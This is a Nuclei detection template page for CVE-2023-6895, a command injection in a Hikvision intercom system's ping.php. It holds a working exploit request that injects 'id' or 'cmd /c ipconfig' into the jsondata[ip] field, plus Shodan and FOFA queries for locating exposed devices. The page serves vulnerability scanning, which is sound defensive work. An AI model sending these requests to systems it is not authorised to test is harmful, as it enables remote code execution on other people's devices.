Hikvision IP ping.php - Command Execution
ID: CVE-2023-6895
Severity: critical
Author: DhiyaneshDk,archer
Tags: cve,cve2023,hikvision,rce
Description
Section titled “Description”A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability.
YAML Source
Section titled “YAML Source”id: CVE-2023-6895
info: name: Hikvision IP ping.php - Command Execution author: DhiyaneshDk,archer severity: critical description: | A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability. reference: - https://vuldb.com/?ctiid.248254 - https://vuldb.com/?id.248254 - https://github.com/tanjiti/sec_profile - https://github.com/wy876/POC - https://github.com/xingchennb/POC- classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-6895 cwe-id: CWE-78 epss-score: 0.89707 epss-percentile: 0.9876 cpe: cpe:2.3:o:hikvision:intercom_broadcast_system:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: hikvision product: intercom_broadcast_system shodan-query: http.favicon.hash:"-1830859634" fofa-query: "icon_hash=\"-1830859634\"" tags: cve,cve2023,hikvision,rce
http: - method: POST path: - "{{BaseURL}}/php/ping.php" body: "jsondata%5Btype%5D=99&jsondata%5Bip%5D={{command}}" headers: Content-Type: "application/x-www-form-urlencoded"
payloads: command: - 'id' - 'cmd /c ipconfig'
matchers-condition: and matchers: - type: regex part: body regex: - "Windows IP" - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" condition: or
- type: word part: header words: - "text/html"
- type: status status: - 200# digest: 4b0a00483046022100edf4b9b1a7dc2bb8ca6d16655d4e1a1f4c590a3b8ad1fc7052b746dba8bdea40022100fea23e92b6df4632628b96ee37b192b42bc03d665bba87e9f3c4c9fa34b0a4ce:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-6895.yaml"